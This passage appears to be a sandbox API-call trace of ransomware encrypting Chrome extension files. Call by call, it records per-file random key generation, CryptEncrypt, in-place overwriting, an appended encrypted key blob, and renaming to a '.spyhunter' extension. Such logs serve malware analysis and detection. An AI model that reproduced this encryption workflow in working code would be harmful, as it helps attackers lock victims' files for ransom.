"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json.spyhunter")) returned 1 [0135.496] GetProcessHeap () returned 0x2c0000 [0135.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0135.496] GetProcessHeap () returned 0x2c0000 [0135.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0135.496] GetProcessHeap () returned 0x2c0000 [0135.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f815a8 | out: hHeap=0x2c0000) returned 1 [0135.497] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f2c0 | out: pbBuffer=0x270f2c0) returned 1 [0135.497] GetProcessHeap () returned 0x2c0000 [0135.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0135.497] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f2b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f2b8*=0x30) returned 1 [0135.497] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0135.498] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json") returned 157 [0135.498] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.498] GetProcessHeap () returned 0x2c0000 [0135.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0135.498] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f27c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f27c*=0xb3, lpOverlapped=0x0) returned 1 [0135.530] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.530] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x270f27c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f27c*=0xb3, lpOverlapped=0x0) returned 1 [0135.530] GetProcessHeap () returned 0x2c0000 [0135.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0135.530] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.530] WriteFile (in: hFile=0x17c, lpBuffer=0x270f2bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f27c, lpOverlapped=0x0 | out: lpBuffer=0x270f2bc*, lpNumberOfBytesWritten=0x270f27c*=0x4, lpOverlapped=0x0) returned 1 [0135.530] WriteFile (in: hFile=0x17c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f27c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f27c*=0x30, lpOverlapped=0x0) returned 1 [0135.530] CloseHandle (hObject=0x17c) returned 1 [0135.531] GetProcessHeap () returned 0x2c0000 [0135.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0135.531] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json.spyhunter") returned 167 [0135.531] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json.spyhunter")) returned 1 [0135.532] GetProcessHeap () returned 0x2c0000 [0135.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0135.532] GetProcessHeap () returned 0x2c0000 [0135.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0135.532] GetProcessHeap () returned 0x2c0000 [0135.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f81420 | out: hHeap=0x2c0000) returned 1 [0135.750] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f2b8 | out: pbBuffer=0x270f2b8) returned 1 [0135.750] GetProcessHeap () returned 0x2c0000 [0135.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0135.750] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270f2b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270f2b0*=0x30) returned 1 [0135.750] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0136.045] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json") returned 164 [0136.045] StrStrW (lpFirst="verified_contents.json", lpSrch=".txt") returned 0x0 [0136.046] GetProcessHeap () returned 0x2c0000 [0136.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0136.046] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f274, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f274*=0x2769, lpOverlapped=0x0) returned 1 [0136.179] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd897, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.179] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2769, lpNumberOfBytesWritten=0x270f274, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f274*=0x2769, lpOverlapped=0x0) returned 1 [0136.179] GetProcessHeap () returned 0x2c0000 [0136.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0136.179] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.180] WriteFile (in: hFile=0x17c, lpBuffer=0x270f2b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f274, lpOverlapped=0x0 | out: lpBuffer=0x270f2b4*, lpNumberOfBytesWritten=0x270f274*=0x4, lpOverlapped=0x0) returned 1 [0136.180] WriteFile (in: hFile=0x17c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f274, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270f274*=0x30, lpOverlapped=0x0) returned 1 [0136.180] CloseHandle (hObject=0x17c) returned 1 [0136.180] GetProcessHeap () returned 0x2c0000 [0136.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.180] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json.spyhunter") returned 174 [0136.180] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json.spyhunter")) returned 1 [0136.181] GetProcessHeap () returned 0x2c0000 [0136.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.181] GetProcessHeap () returned 0x2c0000 [0136.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0136.181] GetProcessHeap () returned 0x2c0000 [0136.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e17ae8 | out: hHeap=0x2c0000) returned 1 [0136.182] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f2b0 | out: pbBuffer=0x270f2b0) returned 1 [0136.182] GetProcessHeap () returned 0x2c0000 [0136.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0136.182] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270f2a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270f2a8*=0x30) returned 1 [0136.182] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0136.183] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json") returned 155 [0136.183] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.183] GetProcessHeap () returned 0x2c0000 [0136.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0136.183] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f26c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f26c*=0x130, lpOverlapped=0x0) returned 1 [0136.184] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfffffed0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.184] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x270f26c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f26c*=0x130, lpOverlapped=0x0) returned 1 [0136.184] GetProcessHeap () returned 0x2c0000 [0136.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0136.184] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.184] WriteFile (in: hFile=0x17c, lpBuffer=0x270f2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f26c, lpOverlapped=0x0 | out: lpBuffer=0x270f2ac*, lpNumberOfBytesWritten=0x270f26c*=0x4, lpOverlapped=0x0) returned 1 [0136.184] WriteFile (in: hFile=0x17c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f26c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270f26c*=0x30, lpOverlapped=0x0) returned 1 [0136.184] CloseHandle (hObject=0x17c) returned 1 [0136.185] GetProcessHeap () returned 0x2c0000 [0136.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.185] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json.spyhunter") returned 165 [0136.185] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json.spyhunter")) returned 1 [0136.186] GetProcessHeap () returned 0x2c0000 [0136.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.186] GetProcessHeap () returned 0x2c0000 [0136.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0136.186] GetProcessHeap () returned 0x2c0000 [0136.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f80990 | out: hHeap=0x2c0000) returned 1 [0136.187] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f2a8 | out: pbBuffer=0x270f2a8) returned 1 [0136.187] GetProcessHeap () returned 0x2c0000 [0136.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0136.187] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270f2a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270f2a0*=0x30) returned 1 [0136.188] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0136.188] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json") returned 155 [0136.188] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.188] GetProcessHeap () returned 0x2c0000 [0136.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0136.188] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f264, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f264*=0xdc, lpOverlapped=0x0) returned 1 [0136.189] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffff24, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.189] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xdc, lpNumberOfBytesWritten=0x270f264, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f264*=0xdc, lpOverlapped=0x0) returned 1 [0136.189] GetProcessHeap () returned 0x2c0000 [0136.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0136.189] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.189] WriteFile (in: hFile=0x17c, lpBuffer=0x270f2a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f264, lpOverlapped=0x0 | out: lpBuffer=0x270f2a4*, lpNumberOfBytesWritten=0x270f264*=0x4, lpOverlapped=0x0) returned 1 [0136.189] WriteFile (in: hFile=0x17c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f264, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270f264*=0x30, lpOverlapped=0x0) returned 1 [0136.190] CloseHandle (hObject=0x17c) returned 1 [0136.190] GetProcessHeap () returned 0x2c0000 [0136.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.190] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json.spyhunter") returned 165 [0136.190] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json.spyhunter")) returned 1 [0136.190] GetProcessHeap () returned 0x2c0000 [0136.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.190] GetProcessHeap () returned 0x2c0000 [0136.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0136.191] GetProcessHeap () returned 0x2c0000 [0136.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f80680 | out: hHeap=0x2c0000) returned 1 [0136.192] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f2a0 | out: pbBuffer=0x270f2a0) returned 1 [0136.192] GetProcessHeap () returned 0x2c0000 [0136.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0136.192] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270f298*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270f298*=0x30) returned 1 [0136.192] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0136.193] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json") returned 155 [0136.193] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.193] GetProcessHeap () returned 0x2c0000 [0136.193] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0136.193] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f25c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f25c*=0xcf, lpOverlapped=0x0) returned 1 [0136.194] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffff31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.194] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xcf, lpNumberOfBytesWritten=0x270f25c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f25c*=0xcf, lpOverlapped=0x0) returned 1 [0136.194] GetProcessHeap () returned 0x2c0000 [0136.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0136.194] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.194] WriteFile (in: hFile=0x17c, lpBuffer=0x270f29c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f25c, lpOverlapped=0x0 | out: lpBuffer=0x270f29c*, lpNumberOfBytesWritten=0x270f25c*=0x4, lpOverlapped=0x0) returned 1 [0136.194] WriteFile (in: hFile=0x17c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f25c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270f25c*=0x30, lpOverlapped=0x0) returned 1 [0136.194] CloseHandle (hObject=0x17c) returned 1 [0136.194] GetProcessHeap () returned 0x2c0000 [0136.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.195] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json.spyhunter") returned 165 [0136.195] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json.spyhunter")) returned 1 [0136.195] GetProcessHeap () returned 0x2c0000 [0136.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.195] GetProcessHeap () returned 0x2c0000 [0136.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0136.196] GetProcessHeap () returned 0x2c0000 [0136.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f80370 | out: hHeap=0x2c0000) returned 1 [0136.197] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f298 | out: pbBuffer=0x270f298) returned 1 [0136.197] GetProcessHeap () returned 0x2c0000 [0136.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0136.197] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270f290*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270f290*=0x30) returned 1 [0136.197] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 